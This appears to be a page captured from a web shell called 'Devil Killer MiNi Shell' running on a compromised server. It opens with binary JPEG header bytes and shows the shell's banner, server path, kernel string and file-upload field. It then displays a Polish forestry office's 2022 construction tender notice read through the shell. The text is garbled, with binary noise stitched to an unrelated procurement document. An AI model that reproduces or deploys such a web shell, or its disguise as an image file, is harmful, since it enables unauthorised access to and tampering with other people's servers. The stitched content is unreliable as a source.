JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220127/0003870701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa samodzielnej kancelarii leśniczego w Leśnictwie Otanów wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu na działce o nr ewid.63/14,245/3,gm.Myślibórz,obręb Otanów. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Myślibórz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810539232</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Myślibórz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 747 23 81</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mysliborz@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mysliborz.szczecin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa samodzielnej kancelarii leśniczego w Leśnictwie Otanów wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu na działce o nr ewid.63/14,245/3,gm.Myślibórz,obręb Otanów. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4aa29bc1-7edf-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00038707</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadlesnictwo_mysliborz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie komunikował się z Wykonawcami przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy SmartPZP, pod adresem https://portal.smartpzp.pl/nadlesnictwo_mysliborz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy SmartPZP (dalej:„Platforma”). Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w zakładce „Korespondencja”. Sposób<br/>sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 r. poz. 2452). Za datę wpływu oświadczeń, ofert, wniosków, zaświadczeń oraz informacji przyjmuje się datę ich przekazania do Platformy. Aktualna data i godzina, zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu Platformy. W celu skorzystania z Platformy konieczna jest rejestracja Wykonawcy pod adresem: https://portal.smartpzp.pl/nadlesnictwo_mysliborz po kliknięciu na przycisk „Załóż konto”. Wykonawca<br/>rejestrując się akceptuje warunki korzystania z Platformy, określone w Regulaminie podczas rejestracji<br/>oraz uznaje go za wiążący. Korzystanie z Platformy jest bezpłatne. Podgląd i pobieranie dokumentacji<br/>postępowania nie wymaga logowania. Zamawiający, informuje, że Platforma jest kompatybilna ze<br/>wszystkimi podpisami elektronicznymi. Do przesłania dokumentów i złożenia oferty nie jest niezbędne<br/>posiadanie certyfikatu kwalifikowanego. Minimalne wymagania techniczne dotyczące korzystania z Platformy: a) przesyłane dokumenty powinny być załączone w formie plików w formacie odpowiednio<br/>.png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt,<br/>.ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg; b) wymagania sprzętowe dla Wykonawcy: (i) przeglądarka<br/>internetowa Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58<br/>i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11, (ii) lista zalecanych przeglądarek<br/>internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji<br/>przeglądarek, (iii) system operacyjny Windows 7 i późniejsze, (iv) zainstalowane środowisko Java w<br/>wersji min. 1.8 (jre), (v) w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować<br/>dodatek do przeglądarki Szafir SDK Web, (vi) oprogramowanie SzafirHost w systemie operacyjnym,<br/>(vii) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s, (viii)<br/>komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz<br/>lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich<br/>nowsze wersje, (ix) zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów<br/>.pdf. Pozostałe wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Regulaminie korzystania z Platformy. Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz<br/>do komunikacji wynosi 100 MB. Za pośrednictwem Systemu można przesłać wiele pojedynczych<br/>plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików. Wymagania<br/>techniczne i organizacyjne dotyczące korespondencji elektronicznej opisane zostały w rozdziale 10<br/>SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.1.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na budowie budynku biurowego (samodzielnej kancelarii leśniczego) w leśnictwie Otanów wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu na działce o nr ewid. 63/14, 245/3; gmina:<br/>Myślibórz, obręb: Otanów wraz z uzyskaniem ostatecznej decyzji o pozwoleniu na użytkowanie.<br/>Zamawiający wymaga, aby budowa budynku kancelarii realizowana była w technologii drewnianej z wykorzystaniem prefabrykowanych gotowych elementów oraz montażu na placu budowy tych elementów (modułów) ściennych, dachowych, stropowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45212000-6 - Roboty budowlane w zakresie budowy wypoczynkowych, sportowych, kulturalnych, hotelowych i restauracyjnych obiektów budowlanych</p> <p class="mb-0">45222000-9 - Roboty budowlane w zakresie robót inżynieryjnych, z wyjątkiem mostów, tuneli, szybów i kolei podziemnej</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45232310-8 - Roboty budowlane w zakresie linii telefonicznych</p> <p class="mb-0">45232460-4 - Roboty sanitarne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45331211-8 - Instalowanie wentylacji zewnętrznej</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">280 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę zostanie uznana oferta Wykonawcy, która<br/>uzyska największą liczbę punktów w ramach kryteriów oceny oferty określonych w rozdziale 16 SWZ tj. cena oraz przedłużenie minimalnego okresu gwarancji jakości.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie minimalnego okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku<br/>zdolności do występowania w obrocie gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów.<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku<br/>posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>3) sytuacji ekonomicznej lub finansowej.<br/>Warunek w odniesieniu do sytuacji ekonomicznej lub finansowej, zostanie spełniony, jeśli<br/>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową o wartości nie<br/>mniejszej niż 120 000,00 zł (słownie złotych: sto dwadzieścia tysięcy 00/100).<br/>4) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że w okresie ostatnich 5 lat od dnia w którym upływa termin składania ofert (a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej jedną robotę<br/>budowlaną (przez robotę budowlaną rozumie się wykonywanie prac na podstawie 1 umowy)<br/>polegającą na budowie budynku całorocznego w technologii drewnianej (o drewnianej<br/>konstrukcji ścian, stropów, dachu), obejmującej wykonanie robót branży budowlanej, sanitarnej i<br/>elektrycznej o łącznej wartości zadania nie mniejszej niż 250 000,00 zł brutto.<br/>Pod pojęciem budowy należy rozumieć wykonywanie obiektu budowlanego w określonym<br/>miejscu, a także odbudowę, rozbudowę lub nadbudowę obiektu budowlanego (art. 3 pkt 6<br/>ustawy Prawo budowlane),<br/>b) Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do potencjału<br/>technicznego,<br/>c) Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia,<br/>zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował co<br/>najmniej po jednej osobie na:<br/>- kierownik budowy (co najmniej 1 osoba) - Posiadającą uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń wydane<br/>zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2020<br/>r., poz. 1333 ze zm., dalej – „Prawo budowlane”) lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub<br/>odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru<br/>Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych<br/>przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(tekst jedn. Dz. U. z 2020 r., poz. 220 z późn. zm.), które uprawniają do pełnienia samodzielnych<br/>funkcji technicznych w budownictwie przy realizacji przedmiotu zamówienia, biorąc pod uwagę<br/>jego zakres.<br/>- kierownik robót sanitarnych (co najmniej 1 osoba) - Posiadającą uprawnienia do kierowania<br/>robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,<br/>wydane zgodnie z przepisami ustawy Prawo budowlane lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego<br/>Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych<br/>przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(tekst jedn. Dz. U. z 2020r., poz. 220 z późn. zm.), które uprawniają do pełnienia samodzielnych<br/>funkcji technicznych w budownictwie przy realizacji przedmiotu zamówienia, biorąc pod uwagę<br/>jego zakres.<br/>- kierownik robót elektrycznych (co najmniej 1 osoba) - Posiadającą uprawnienia do kierowania<br/>robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, wydane zgodnie z przepisami ustawy<br/>Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane<br/>na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane<br/>obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z<br/>zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (tekst jedn. Dz. U. z 2020 r., poz. 220 z późn. zm.), które<br/>uprawniają do pełnienia samodzielnych funkcji technicznych w budownictwie przy realizacji<br/>przedmiotu zamówienia, biorąc pod uwagę jego zakres. Zamawiający dopuszcza realizację<br/>zamówienia przez jedną lub dwie osoby posiadające łącznie ww. kwalifikacje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Zamawiający<br/>działając na podst.art.274ust.1PZPwezwie Wykonawcę,którego oferta została najwyżej oceniona,do<br/>złożenia w wyznaczonym terminie,nie krótszym niż5dni od dnia wezwania,aktualnych na dzień<br/>złożenia następujących podmiotowych środków dowodowych:1)informacji z Krajowego Rejestru<br/>Karnego w zakresie: a)art.108ust.1pkt1i2PZP,b)art.108ust.1pkt4PZP,dot.orzeczenia zakazu ubiegania<br/>się o zamówienie publiczne tytułem środka karnego–sporządzonej nie wcześniej niż6miesięcy przed jej<br/>złożeniem;2)oświadczenia Wykonawcy,w zakresie art.108 ust.1pkt5PZP,o braku przynależności do tej<br/>samej grupy kapitałowej,w rozumieniu ustawy z dn.16.02.2007r.o ochronie konkurencji i<br/>konsumentów(tekst jedn.Dz.U.z2021r.poz.275)z innym Wykonawcą,który złożył odrębną ofertę albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej;3)zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego,że<br/>Wykonawca nie zalega z opłacaniem podatków i opłat,w zakresie art.109 ust.1pkt1)PZP,wystawionego<br/>nie wcześniej niż3miesiące przed jego złożeniem,a w przypadku zalegania z opłaceniem podatków lub<br/>opłat wraz z zaświadczeniem,Zamawiający żąda złożenia dokumentów potwierdzających,że przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;4)zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej<br/>Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki<br/>terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego,że Wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie<br/>art.109ust.1pkt1PZP,wystawionego nie wcześniej niż3miesiące przed jego złożeniem,a w przypadku<br/>zalegania z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem<br/>albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających,że przed upływem<br/>terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności,5)odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej,w zakresie art.109ust.1pkt4)PZP,sporządzonych nie wcześniej<br/>niż3miesiące przed jej złożeniem,jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji,6)oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu,o którym<br/>mowa w art.125ust.1PZP(oświadczenie o braku podstaw do wykluczenia,sporządzone wg zał.nr3B do<br/>SWZ),w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego,o których<br/>mowa 